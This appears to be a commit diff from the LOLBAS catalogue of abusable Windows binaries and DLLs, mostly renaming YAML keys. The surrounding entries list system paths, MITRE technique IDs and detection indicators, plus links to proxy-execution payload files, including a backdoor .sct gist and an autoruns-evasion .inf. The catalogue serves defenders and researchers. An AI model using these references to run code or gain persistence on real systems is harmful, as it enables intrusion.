MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
Full_Path:
- Path: C:\Windows\System32\runonce.exe
- Path: C:\Windows\SysWOW64\runonce.exe
Code Sample:
Code_Sample:
- Code:
Detection:
- IOC: HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\YOURKEY

View File

@ -12,10 +12,10 @@ Commands:
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
Full_Path:
- Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe
- Path: CC:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe
Code Sample:
Code_Sample:
- Code:
Detection:
- IOC: Event 4014 - Powershell logging

View File

@ -12,10 +12,10 @@ Commands:
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
Full_Path:
- Path: C:\Windows\System32\sc.exe
- Path: C:\Windows\SysWOW64\sc.exe
Code Sample:
Code_Sample:
- Code:
Detection:
- IOC: Services that gets created

View File

@ -12,10 +12,10 @@ Commands:
MitreID: T1053
MitreLink: https://attack.mitre.org/wiki/Technique/T1053
OperatingSystem: Windows
Full Path:
Full_Path:
- Path: c:\windows\system32\schtasks.exe
- Path: c:\windows\syswow64\schtasks.exe
Code Sample:
Code_Sample:
- Code:
Detection:
- IOC: Services that gets created

View File

@ -20,10 +20,10 @@ Commands:
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
Full_Path:
- Path: C:\Windows\System32\scriptrunner.exe
- Path: C:\Windows\SysWOW64\scriptrunner.exe
Code Sample:
Code_Sample:
- Code:
Detection:
- IOC: Scriptrunner.exe should not be in use unless App-v is deployed

View File

@ -12,10 +12,10 @@ Commands:
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
Full_Path:
- Path: C:\Windows\System32\SyncAppvPublishingServer.exe
- Path: C:\Windows\SysWOW64\SyncAppvPublishingServer.exe
Code Sample:
Code_Sample:
- Code:
Detection:
- IOC: SyncAppvPublishingServer.exe should never be in use unless App-V is deployed

View File

@ -12,10 +12,10 @@ Commands:
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows 10
Full Path:
Full_Path:
- Path: C:\Windows\System32\verclsid.exe
- Path: C:\Windows\SysWOW64\verclsid.exe
Code Sample:
Code_Sample:
- Code:
Detection:
- IOC:

View File

@ -12,10 +12,10 @@ Commands:
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
Full_Path:
- Path: C:\Program Files\Windows Mail\wab.exe
- Path: C:\Program Files (x86)\Windows Mail\wab.exe
Code Sample:
Code_Sample:
- Code:
Detection:
- IOC: WAB.exe should normally never be used

View File

@ -68,10 +68,10 @@ Commands:
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
Full_Path:
- Path: C:\Windows\System32\wmic.exe
- Path: C:\Windows\SysWOW64\wmic.exe
Code Sample:
Code_Sample:
- Code:
Detection:
- IOC: Wmic getting scripts from remote system

View File

@ -12,10 +12,10 @@ Commands:
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
Full_Path:
- Path: C:\Windows\System32\wscript.exe
- Path: C:\Windows\SysWOW64\wscript.exe
Code Sample:
Code_Sample:
- Code:
Detection:
- IOC: Wscript.exe executing code from alternate data streams

View File

@ -20,10 +20,10 @@ Commands:
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
Full_Path:
- Path: C:\Windows\System32\xwizard.exe
- Path: C:\Windows\SysWOW64\xwizard.exe
Code Sample:
Code_Sample:
- Code:
Detection:
- IOC:
@ -38,5 +38,5 @@ Acknowledgement:
- Person: Nick Tyrer
Handle: '@NickTyrer'
- Person: harr0ey
Handle: @harr0ey
Handle: '@harr0ey'
---

View File

@ -42,10 +42,10 @@ Commands:
Privileges: User
MitreID: T1085
MItreLink: https://attack.mitre.org/wiki/Technique/T1085
Full Path:
Full_Path:
- Path: c:\windows\system32\advpack.dll
- Path: c:\windows\syswow64\advpack.dll
Code Sample:
Code_Sample:
- Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Advpack.inf
- Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Advpack_calc.sct
Detection:

View File

@ -42,10 +42,10 @@ Commands:
Privileges: User
MitreID: T1085
MItreLink: https://attack.mitre.org/wiki/Technique/T1085
Full Path:
Full_Path:
- Path: c:\windows\system32\ieadvpack.dll
- Path: c:\windows\syswow64\ieadvpack.dll
Code Sample:
Code_Sample:
- Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Ieadvpack.inf
- Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Ieadvpack_calc.sct
Detection:

View File

@ -12,10 +12,10 @@ Commands:
MitreID: T1085
MItreLink: https://attack.mitre.org/wiki/Technique/T1085
OperatingSystem: Windows
Full Path:
Full_Path:
- Path: c:\windows\system32\ieframe.dll
- Path: c:\windows\syswow64\ieframe.dll
Code Sample:
Code_Sample:
- Code: https://gist.githubusercontent.com/bohops/89d7b11fa32062cfe31be9fdb18f050e/raw/1206a613a6621da21e7fd164b80a7ff01c5b64ab/calc.url
Detection:
- IOC:

View File

@ -12,10 +12,10 @@ Commands:
MitreID: T1085
MItreLink: https://attack.mitre.org/wiki/Technique/T1085
OperatingSystem: Windows
Full Path:
Full_Path:
- Path: c:\windows\system32\mshtml.dll
- Path: c:\windows\syswow64\mshtml.dll
Code Sample:
Code_Sample:
- Code:
Detection:
- IOC:

View File

@ -12,10 +12,10 @@ Commands:
MitreID: T1085
MItreLink: https://attack.mitre.org/wiki/Technique/T1085
OperatingSystem: Windows
Full Path:
Full_Path:
- Path: c:\windows\system32\pcwutl.dll
- Path: c:\windows\syswow64\pcwutl.dll
Code Sample:
Code_Sample:
- Code:
Detection:
- IOC:
@ -25,3 +25,4 @@ Resources:
Acknowledgement:
- Person: Matt harr0ey
Handle: '@harr0ey'
---

View File

@ -20,10 +20,10 @@ Commands:
MitreID: T1085
MitreLink: https://attack.mitre.org/wiki/Technique/T1085
OperatingSystem: Windows
Full Path:
Full_Path:
- Path: c:\windows\system32\setupapi.dll
- Path: c:\windows\syswow64\setupapi.dll
Code Sample:
Code_Sample:
- Code: https://raw.githubusercontent.com/huntresslabs/evading-autoruns/master/shady.inf
- Code: https://gist.github.com/enigma0x3/469d82d1b7ecaf84f4fb9e6c392d25ba#file-backdoor-minimalist-sct
- Code: https://gist.githubusercontent.com/enigma0x3/469d82d1b7ecaf84f4fb9e6c392d25ba/raw/6cb52b88bcc929f5555cd302d9ed848b7e407052/Backdoor-Minimalist.sct

View File

@ -12,10 +12,10 @@ Commands:
MitreID: T1085
MItreLink: https://attack.mitre.org/wiki/Technique/T1085
OperatingSystem: Windows
Full Path:
Full_Path:
- Path: c:\windows\system32\shdocvw.dll
- Path: c:\windows\syswow64\shdocvw.dll
Code Sample:
Code_Sample:
- Code: https://gist.githubusercontent.com/bohops/89d7b11fa32062cfe31be9fdb18f050e/raw/1206a613a6621da21e7fd164b80a7ff01c5b64ab/calc.url
Detection:
- IOC:

View File

@ -26,10 +26,10 @@ Commands:
Privileges: User
MitreID: T1085
MItreLink: https://attack.mitre.org/wiki/Technique/T1085
Full Path:
Full_Path:
- Path: c:\windows\system32\shell32.dll
- Path: c:\windows\syswow64\shell32.dll
Code Sample:
Code_Sample:
- Code:
Detection:
- IOC:

View File

@ -20,10 +20,10 @@ Commands:
MitreID: T1085
MitreLink: https://attack.mitre.org/wiki/Technique/T1085
OperatingSystem: Windows
Full Path:
Full_Path:
- Path: c:\windows\system32\syssetup.dll
- Path: c:\windows\syswow64\syssetup.dll
Code Sample:
Code_Sample:
- Code: https://raw.githubusercontent.com/huntresslabs/evading-autoruns/master/shady.inf
- Code: https://gist.github.com/enigma0x3/469d82d1b7ecaf84f4fb9e6c392d25ba#file-backdoor-minimalist-sct
- Code: https://gist.github.com/homjxi0e/87b29da0d4f504cb675bb1140a931415

View File

@ -52,10 +52,10 @@ Commands:
MitreID: T1085
MItreLink: https://attack.mitre.org/wiki/Technique/T1085
OperatingSystem: Windows
Full Path:
Full_Path:
- Path: c:\windows\system32\url.dll
- Path: c:\windows\syswow64\url.dll
Code Sample:
Code_Sample:
- Code:
Detection:
- IOC:

View File

@ -20,10 +20,10 @@ Commands:
MitreID: T1085
MItreLink: https://attack.mitre.org/wiki/Technique/T1085
OperatingSystem: Windows
Full Path:
Full_Path:
- Path: c:\windows\system32\zipfldr.dll
- Path: c:\windows\syswow64\zipfldr.dll
Code Sample:
Code_Sample:
- Code:
Detection:
- IOC:

View File

@ -12,11 +12,11 @@ Commands:
MitreID: T1216
MitreLink: https://attack.mitre.org/wiki/Technique/T1216
OperatingSystem: Windows 10
Full Path:
Full_Path:
- Path: C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1
- Path: C:\Windows\diagnostics\system\Audio\CL_Mutexverifiers.ps1
- Path: C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1
Code Sample:
Code_Sample:
- Code:
Detection:
- IOC:

View File

@ -12,11 +12,11 @@ Commands:
MitreID: T1216
MitreLink: https://attack.mitre.org/wiki/Technique/T1216
OperatingSystem: Windows 10
Full Path:
Full_Path:
- Path: C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1
- Path: C:\Windows\diagnostics\system\Audio\CL_Invocation.ps1
- Path: C:\Windows\diagnostics\system\WindowsUpdate\CL_Invocation.ps1
Code Sample:
Code_Sample:
- Code:
Detection:
- IOC:

View File

@ -20,9 +20,9 @@ Commands:
MitreID: T1216
MitreLink: https://attack.mitre.org/wiki/Technique/T1216
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
Full_Path:
- Path: C:\Windows\System32\manage-bde.wsf
Code Sample:
Code_Sample:
- Code:
Detection:
- IOC: Manage-bde.wsf should normally not be invoked by a user

View File

@ -12,10 +12,10 @@ Commands:
MitreID: T1216
MitreLink: https://attack.mitre.org/wiki/Technique/T1216
OperatingSystem: Windows 10
Full Path:
Full_Path:
- Path: C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs
- Path: C:\Windows\SysWOW64\Printing_Admin_Scripts\en-US\pubprn.vbs
Code Sample:
Code_Sample:
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSScripts/Payload/Pubprn_calc.sct
Detection:
- IOC:

View File

@ -12,10 +12,10 @@ Commands:
MitreID: T1216
MitreLink: https://attack.mitre.org/wiki/Technique/T1216
OperatingSystem: Windows 10
Full Path:
Full_Path:
- Path: C:\Windows\System32\slmgr.vbs
- Path: C:\Windows\SysWOW64\slmgr.vbs
Code Sample:
Code_Sample:
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSScripts/Payload/Slmgr_calc.sct
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSScripts/Payload/Slmgr.reg
Detection:

View File

@ -12,9 +12,9 @@ Commands:
MitreID: T1216
MitreLink: https://attack.mitre.org/wiki/Technique/T1216
OperatingSystem: Windows 10
Full Path:
Full_Path:
- Path: C:\Windows\System32\SyncAppvPublishingServer.vbs
Code Sample:
Code_Sample:
- Code:
Detection:
- IOC:

View File

@ -36,10 +36,10 @@ Commands:
MitreID: T1216
MitreLink: https://attack.mitre.org/wiki/Technique/T1216
OperatingSystem: Windows 10
Full Path:
Full_Path:
- Path: C:\Windows\System32\winrm.vbs
- Path: C:\Windows\SysWOW64\winrm.vbs
Code Sample:
Code_Sample:
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSScripts/Payload/Slmgr.reg
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSScripts/Payload/Slmgr_calc.sct
Detection:

View File

@ -12,10 +12,10 @@ Commands:
MitreID: T1216
MitreLink: https://attack.mitre.org/wiki/Technique/T1216
OperatingSystem: Windows 10
Full Path:
Full_Path:
- Path: c:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\bin\Pester.bat
- Path: c:\Program Files\WindowsPowerShell\Modules\Pester\*\bin\Pester.bat
Code Sample:
Code_Sample:
- Code:
Detection:
- IOC:

View File

@ -28,10 +28,10 @@ Commands:
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows 10 w/Office 2016
Full Path:
Full_Path:
- Path: C:\Program Files\Microsoft Office\root\client\appvlp.exe
- Path: C:\Program Files (x86)\Microsoft Office\root\client\appvlp.exe
Code Sample:
Code_Sample:
- Code:
Detection:
- IOC:

View File

@ -52,9 +52,9 @@ Commands:
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows
Full Path:
Full_Path:
- Path: No fixed path
Code Sample:
Code_Sample:
- Code:
Detection:
- IOC:

View File

@ -12,10 +12,10 @@ Commands:
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows
Full Path:
Full_Path:
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\cdb.exe
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\cdb.exe
Code Sample:
Code_Sample:
- Code:
Detection:
- IOC:

Some files were not shown because too many files have changed in this diff Show More